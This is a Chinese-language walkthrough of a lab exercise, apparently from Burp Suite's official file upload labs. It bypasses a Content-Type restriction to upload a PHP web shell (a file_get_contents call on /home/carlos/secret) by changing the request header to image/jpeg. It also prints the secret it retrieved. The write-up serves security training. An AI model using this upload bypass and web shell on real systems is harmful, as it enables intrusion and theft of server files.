bp官方靶场File upload vulnerabilities 文件上传漏洞2

第二关 通过内容类型限制绕过上传 Web shell

这一关就是通过绕过内容限制，进行上传恶意文件，从而获取用户秘钥

提示：1、靶场包含易受攻击的图片上传功能

2、它试图防止用户上传意外的文件类型

3、请上传一个基本的 PHP Web shell 并使用它来窃取文件 /home/carlos/secret 的内容

具体操作：

1、正常登录wiener用户，然后上传头像图片

2、上传头像图片成功

然后返回我的账户，查看上传的图片

以上就一个上传头像图片的正常流程

3、接下来尝试上传下恶意文件

创建一个名为 exploit.php 的文件，其中包含用于获取 Carlos 密钥内容的脚本：

<?php echo file_get_contents('/home/carlos/secret'); ?>

提示我们上传失败：抱歉，文件类型application(应用程序)/octet-stream（字节流）不允许。仅允许image/jpeg图像和image/png图像格式。上传文件时出现错误。

4、找到触发的数据包

把Content-Type: application/octet-stream改成：

Content-Type: image/jpeg

响应返回200ok，说明更改类型后，恶意文件成功上传

刷新页面

然后返回我的账户

鼠标右键打开图片或者直接访问图片路径，暴露出用户秘钥，复制下

bDryztd5nl3kM0yjpHYbcmFow2fibCsJ

提交用户秘钥，靶场过关